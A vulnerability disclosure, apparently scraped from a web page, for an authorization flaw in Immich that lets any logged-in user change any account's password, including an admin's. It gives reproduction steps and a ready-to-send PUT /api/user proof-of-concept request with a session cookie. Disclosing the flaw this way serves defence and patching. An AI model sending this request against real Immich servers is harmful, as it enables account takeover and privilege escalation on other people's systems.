# Description
Immich does not check for admin privileges when setting account passwords. This allows any user to set the password for any account, thus allowing privilege escalation by admin account takeover.
# Proof of Concept
Steps to reproduce:
“`
1. Login to a non admin account
2. Obtain all user information with a GET request to `/api/user?isAll=false` (this is required for the `Shared Albums` feature). Admins can be found by the `isAdmin` flag
3. Set the password of any account with the following PoC request (adjust the user id accordingly). This is where the authorization check is missing
4. Observe that the target accounts password has been changed. This also works for admin accounts
“`
### PoC Request
“`
PUT /api/user HTTP/1.1
Host: 10.0.2.15:2283
[…]
Cookie: immich_access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiJjNWRhYTE0MC1jYTEzLTQxOGYtYjFkMy0wNzZjNTRhZTgyYTAiLCJlbWFpbCI6Im5vdGFuYWRtaW5AdGVzdC5jb20iLCJpYXQiOjE2NjMyODEzMzcsImV4cCI6MTY2Mzg4NjEzN30.fbGB6YQ04F9JFs8qY4CtLeeah4L79vAh6QlZYJTWFDU; immich_is_authenticated=true
{“id”:”ed0398b5-a64a-4dd5-af58-8a372bdee6e5″,”password”:”password”,”shouldChangePassword”:false}
“`Read More